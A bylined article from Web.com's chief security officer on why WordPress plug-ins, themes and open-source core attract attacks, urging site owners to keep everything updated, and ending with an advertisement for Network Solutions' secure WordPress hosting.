By Geof Birchall, Chief Security Officer at Web.com
For more than 12 years now, the free open source content management system (CMS) WordPress has been available to website owners, large and small. It’s not an exaggeration to say it powers much of the web. In January 2015, it was estimated that WordPress was the foundation of 23 percent of the top 10 million most visited sites on the web. WordPress is the most popular CMS in the world—over 60 million websites are built on it.
There are some solid reasons why WordPress has gained this level of acceptance. But there are also real and present risks that it presents to its users. And ironically, those risks are directly related to what makes WordPress great.
First, let’s talk about the strengths of WordPress. One of the key drivers for the acceptance of WordPress has been its extensibility. It was crafted to easily accept extensions of its core functionality through the installation of plug-ins. Plug-ins provide mostly narrow additions to function that an individual user may desire for their specific use plan. Functions like search engine optimization, multi-user login, navigation or image rotation. There are over 40,000 plug-ins available for the WordPress platform, but beware—not all plug-ins are equal and many provide an attack surface for evildoers to corrupt or hijack your website.
When you are choosing a plug-in to implement on your WordPress site, be careful you select one that has a living, healthy community behind it. Many plug-ins are created by users to solve a problem they may have had, and the plug-in quickly becomes orphaned and never updated again. Over time, vulnerabilities are introduced into the plug-in or at least revealed. Attackers use the power of search engines like Google to trawl the Internet looking for these vulnerable plug-ins and add them to their attack lists.
The second big plus for WordPress is its acceptance of themes. Having the ability to quickly and seamlessly re-skin a website without affecting its content is brilliant. It achieves the goal of separating content from presentation, and makes it possible for small business to present a fresh or seasonal change to its audience without confusing their customers. But just like plug-ins, themes can have undetected vulnerabilities that can put your site at risk.
And finally, the core of the WordPress boom has been the free open-source nature of the platform. That immediately reduces the cost to the business of using WordPress and allows for a low cost stack to run it (Linux/Apache/PHP). The dark twin of this openness is that vulnerability researchers (good and bad) will inevitably discover any weakness in the core application, and use it to further their careers either in ethical reporting or selling the flaw as a Day 0 (a vulnerability for which there is no patch available). The day that a new Day 0 becomes known on WordPress is a busy day for hackers, service providers and small/medium business owners, as they race to mitigate the negative effects.
A conversation I hear a lot from end-users of WordPress goes something like this…
“Why should I care about my WordPress blog/site? I don’t have anything worth stealing”.
The fact is, you do. You just don’t understand what that resource is. Many attacks on WordPress are done in an effort to inject malicious code into your site. This malicious code may be written to inject malware into your visitors’ computers, or more blatantly, redirect them to another site loaded with malware. Your visitors come to you because they trust you as a source. By being part of the attack chain, you are amplifying the attack and damaging your own reputation on the Web.
Another common scenario I see is that an attacker will exploit a vulnerable WordPress site in order to use the resources in another downstream attack. One WordPress site spewing spam to a list is bad enough. But 10,000 of them is a pretty good foundation for a denial-of-service (DoS) attack.
The most impactful thing that comes from this is that it is you, as the WordPress owner, who will feel the backlash most painfully from this. Your ISP or hosting company may shut your site down. Your domain name may get onto one of the many industry blacklists. And your potential customers may see warnings in their browser telling them that your site is untrustworthy.
So how do you take advantage of the value that WordPress provides without falling victim to an attack?
The key is maintenance.
You have to commit to ongoing maintenance on your website that will ensure that you are always at the latest version of PHP, WordPress and any plug-ins or themes you have chosen to use. The trap here is now you are going to be forced to make one of two choices: either you have to gain the skills to maintain your WordPress site or you are going to have to outsource this work to a trusted partner.
As a small business owner, it is tempting to try to control your costs by doing it yourself, but you do so at the risk of diverting precious time and effort away from your core business. Your business expertise is better spent on bring great product or content to the Web, in my opinion. Leave the maintenance upgrades to folks who have made that part of their core business.
Don’t get too engaged in a plug-in. If it no longer has a healthy community behind it, then it presents a dangerous risk to your business and should be discarded or replaced.
There are some great resources out on the Web to help you quantify risk better with your WordPress installation. Check out the find the official list of vulnerabilities on the core WordPress product. You can use WPSCAN to assess the threats on your own assets. But be warned, it’s not as simple as they make out, and you are far better served by finding a good quality partner to handle this work for you.
Protect your WordPress website by using Secure WordPress Hosting from Network Solutions. Secure WordPress eliminates risks associated with outdated plug-ins and those with known vulnerabilities; provides security updates to the WordPress® platform and plugins; scans for and removes malware; creates daily site backups; guards against DDOS attacks, SQL injections, cross-site scripting and more! Learn more.
Geof Birchall is Chief Security Officer at Web.com